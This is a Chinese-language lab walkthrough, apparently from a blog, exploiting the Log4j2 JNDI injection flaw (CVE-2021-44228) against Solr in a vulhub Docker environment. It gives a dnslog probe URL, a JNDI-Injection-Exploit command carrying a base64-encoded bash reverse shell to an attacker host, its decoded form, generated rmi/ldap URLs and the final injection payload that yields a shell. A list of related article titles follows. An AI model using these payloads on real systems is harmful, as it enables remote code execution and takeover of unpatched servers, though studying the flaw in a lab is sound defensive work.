Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
开启环境:
root@bt-virtual-machine:/zbt/vulhub-master/log4j/CVE-2021-44228# docker-compose up -d
Log4j2端口3839页面
http://192.168.29.130:8983/solr/admin/cores?action=1http://192.168.29.130:8983/solr/admin/cores?action=1
去提交dnslog payload参数:
http://192.168.29.130:8983/solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn}
Dnslog中检测到信息,证明存在log4j2漏洞
攻击:
利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
#####192.168.29.128为kali攻击机监听地址,kali机执行
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI5LjEyOC82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.29.128
解密为:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,bash -i >& /dev/tcp/192.168.29.128/6969 0>&1}|{base64,-d}|{bash,-i}" -A 192.168.29.128
得到rmi、ldap参数:
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/vvl2u9
ldap://192.168.29.128:1389/vvl2u9
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.29.128:1099/xs1wkb
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/qzrfe7
ldap://192.168.29.128:1389/qzrfe7
进行payload攻击:
http://192.168.29.130:8983/solr/admin/cores?action=${jndi:rmi://192.168.29.128:1099/vvl2u9}
Kali机监听端口6969获取到权限
关闭环境
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)相关推荐
- Apache Log4j 漏洞(JNDI注入 CVE-2021-44228)
漏洞 影响范围 2.0 <= Apache log4j <= 2.14.1 利用 import org.apache.log4j.Logger;import java.io.*; impo ...
- Apache Log4j2 核弹级漏洞
近日,Apache Log4j2 的远程代码执行漏洞刷爆朋友圈,该漏洞一旦被攻击者利用会造成严重危害.而且此次漏洞影响巨大,很多网站如百度等都是此次 Log4j 远程代码执行漏洞的受害者,很多互联网企 ...
- Apache Log4j2 远程代码执行高危漏洞 解决方案
新闻:https://view.inews.qq.com/a/20211210A05KTY00 博主其他文章 Log4j2 高危漏洞分析 简介: Apache Log4j2是一款优秀的Java日志框架 ...
- Apache Log4j2漏洞复现
0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲.或分或合.起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱 ...
- Apache Log4j2 RCE 命令执行漏洞预警及修复方案
漏洞名称:Apache Log4j2远程代码执行漏洞 组件名称:Apache Log4j2 截止2021年12⽉10⽇,受影响的Apache log4j2版本: 2.0≤Apache Log4j< ...
- 【紧急】Apache Log4j2 远程代码执行漏洞
0x01 漏洞背景 12月9日,监测到网上披露Apache Log4j2 远程代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可 ...
- Apache Log4j2远程代码执行漏洞风险紧急通告,腾讯安全支持全面检测拦截
腾讯安全注意到,一个Apache Log4j2的高危漏洞细节被公开,攻击者利用漏洞可以远程执行代码. 漏洞描述: 腾讯安全注意到,一个Apache Log4j2反序列化远程代码执行漏洞细节已被公开,L ...
- Apache Log4j2远程JNDI代码执行漏洞修复
#漏洞简介 Apache Log4j2远程代码执行漏洞 当打印的日志含有${字符串时程序会使用lookup解析要打印的字符串,执行任意远程代码,框架没有做相应的过滤导致注入.官网已经在2.16.0(j ...
- 分析Apache Log4j2 远程代码执行漏洞
漏洞描述 Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台.文件.GUI组件,甚至是套接口服务器.NT的事件记录器.UNIX Syslog守护进程等:也 ...
最新文章
- ZIP 也能边下载边解压?流式解压技术揭秘!
- 开发人员MySQL调优-实战篇2-让SQL使用索引详解
- python--练习--将字符串转成列表
- php mysql读写分离主从复制_mysql主从复制 读写分离原理及实现
- Spring Boot + Mybatis 实现动态数据源
- android webView的使用
- 三年Java开发,尚学堂java马士兵全套
- 不允许后退提交数据的方法(抗重复刷新提交)
- 【Vue】---- 手动封装on,emit,off
- 如何删除Linux一个目录下部分类型之外的所有文件的三种方法
- linux桌面环境组件下载,万能桌面小组件
- 保护你的隐私,五种控制Android应用的权限的方法
- Java培训学习之分词工具之HanLP介绍
- FreeRTOS+STM32L+BC20+MQTT协议传输温湿度数据,控制继电器云平台——④华为云
- Window Server 2008虚拟机安装
- TabLayout使用介绍
- 2021京东校招实习生面试 一面
- AMD显卡如何用Anaconda安装pytorch
- 武松去厅前声了喏 江民杀毒软件
- 如何用C的easyX图形库制作图形化界面菜单(财务管理系统)